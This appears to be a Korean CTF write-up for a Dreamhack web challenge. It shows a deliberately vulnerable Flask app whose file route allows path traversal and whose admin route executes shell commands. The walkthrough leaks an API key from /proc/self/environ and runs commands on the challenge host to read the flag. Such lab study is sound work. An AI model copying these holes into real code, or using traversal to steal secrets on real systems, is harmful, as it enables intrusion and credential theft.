[2025-07-27] File Vulnerability advanced for Linux

🦥 본문

• main.py

import os, subprocess
from functools import wraps
from flask import Flask, request

app = Flask(__name__)
API_KEY = os.environ.get('API_KEY', None)

def key_required(view):
    @wraps(view)
    def wrapped_view(**kwargs):
        apikey = request.args.get('API_KEY', None)
        if API_KEY and apikey:
            if apikey == API_KEY:
                return view(**kwargs)
        return 'Access Denied !'
    return wrapped_view

@app.route('/', methods=['GET'])
def index():
    return 'API Index'

@app.route('/file', methods=['GET'])
def file():
    path = request.args.get('path', None)
    if path:
        data = open('./files/' + path).read()
        return data
    return 'Error !'

@app.route('/admin', methods=['GET'])
@key_required
def admin():
    cmd = request.args.get('cmd', None)
    if cmd:
        result = subprocess.getoutput(cmd)
        return result
    else:
        return 'Error !'

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True)

/file API는 이용자가 입력하는 경로에 있는 파일을 읽어들이는 API이다.

/admin API는 cmd 파라미터를 통해 시스템 명령어를 실행하는 파일이다. 이 때 @key_required 데코레이터를 통해 API_Key가 환경 변수에 있는 값과 같은 지를 판단한다.

즉, file API를 통해 /proc/self/environ 에서 환경 변수를 알아내고 그 환경 변수를 통해 admin API에 접근하여 flag를 얻어 내면 된다.

이 때 권한을 확인해야 하는 게 권한 확인 안하고 계속 cmd 값에 cat /flag를 넣으니깐 실행이 안된다.

풀이

1. file?path=../../proc/self/environ 을 통해 API_KEY를 가져온다.
   • API_KEY=d22cb18e86fc9e23996650150461c9f794ad3a4f
2. admin API에 API_KEY와 cmd를 파라미터로 접근한다. 이 때 cmd=ls -al / 을 입력하여 루트 디렉토리에 권한 까지 확인한다.

http://host8.dreamhack.games:8251/admin?API_KEY=d22cb18e86fc9e23996650150461c9f794ad3a4f&cmd=ls -al /

1. —x–x–x 권한이므로 실행만 가능하고 읽기 권한은 없다 그러므로 cmd=/flag 를 통해 실행시켜서 출력시킨다.